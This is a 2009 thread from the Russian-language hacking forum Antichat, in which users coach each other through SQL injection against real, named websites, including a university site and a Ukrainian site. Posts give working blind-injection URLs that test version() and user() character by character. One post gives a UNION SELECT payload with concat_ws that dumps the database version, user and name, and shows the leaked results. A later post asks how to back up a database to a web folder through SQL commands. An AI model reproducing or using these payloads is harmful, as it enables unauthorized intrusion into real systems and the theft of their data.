ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
14.02.2009, 02:15
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
Tepp, на гугл может перекидывать, когда в адресе пробелы, но это наверно не тот случай...
|
|
|
14.02.2009, 02:17
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
Saiga, значит там не один запрос к базе данных, подбирай дальше через union select
p.s. не заметил, ты неправильно написал, не unin select, а UNION SELECT
Последний раз редактировалось pinky07; 14.02.2009 в 02:22..
|
|
|
|
14.02.2009, 02:29
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
видемо мне ....
2 pinky07 незнаю как далше .
|
|
|
|
14.02.2009, 02:33
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
Saiga, заканчивай флудить и кидай ссылку.
p.s. терпения не хватило подобрать количество столбцов, в таких случаях можно использовать подзапросы
http://www.christuniversity.in/secmenudisp.php?MID=7+and+substring(version(),1,1) =4
версия Mysql =4
юзер бд:
http://www.christuniversity.in/secmenudisp.php?MID=7+and+ascii(substring(user(),1 ,1))=99 -- c
итд....
// прочитай побольше статей
Последний раз редактировалось pinky07; 14.02.2009 в 03:02..
|
|
|
|
14.02.2009, 02:39
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
hh~tp://www.christuniversity.in/secmenudisp.php?MID=7
|
|
|
|
14.02.2009, 02:55
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
http://www.christuniversity.in/secmenudisp.php?MID=7+and+substring(version(),1,1) =4
ИТД...
|
|
|
|
14.02.2009, 09:29
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
pinky07, зачем усложнять жизнь подзапросами??? это крайняя мера, так как долго и нудно! Этот сайт вообще одна большая скуль =))) каждый параметр и стоило еще чуть посмотреть и вот он
Код:
http://www.christuniversity.in/display_article.php?fid=20&arid=13+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7/*
4.1.22
christco_christ@localhost
christ_university
Последний раз редактировалось Kraneg; 14.02.2009 в 09:40..
|
|
|
|
14.02.2009, 12:34
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
Всем привет!! Вот нашел чтото непонятное на одном сайте соединенном с базой www.uro.net.ua/ - www.uro.net.ua/phpmyadmin/
Вот ошибка www.uro.net.ua/index.php?act=idx&st=-5 - Раскрутить не удается,вообще нивкакую нехочет!!!
|
|
|
|
14.02.2009, 12:37
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от BanQui
Всем привет!! Вот нашел чтото непонятное на одном сайте соединенном с базой www.uro.net.ua/ - www.uro.net.ua/phpmyadmin/
Вот ошибка www.uro.net.ua/index.php?act=idx&st=-5 - Раскрутить не удается,вообще нивкакую нехочет!!!
Код:
SELECT post_id,title,date FROM eA_cp.mainnews ORDER by date DESC LIMIT -5,5
Инъекция в limit после order by.
ничего не сделаешь тут.
|
|
|
|
14.02.2009, 13:23
|
|
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278
Репутация:
114
|
|
В общем есть такой скриптик, там можно управлять базой, но тока при помощи команд, это не пхпмайадмин..
Просто вводиш команду и тебя слушается база...
Вот такой вопрос, как сделать через команду sql чтобы сделать бэкап базы?
К примеру сделать бэкап базы в /www/files
Очень нужно, прошу помочь, с меня +
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
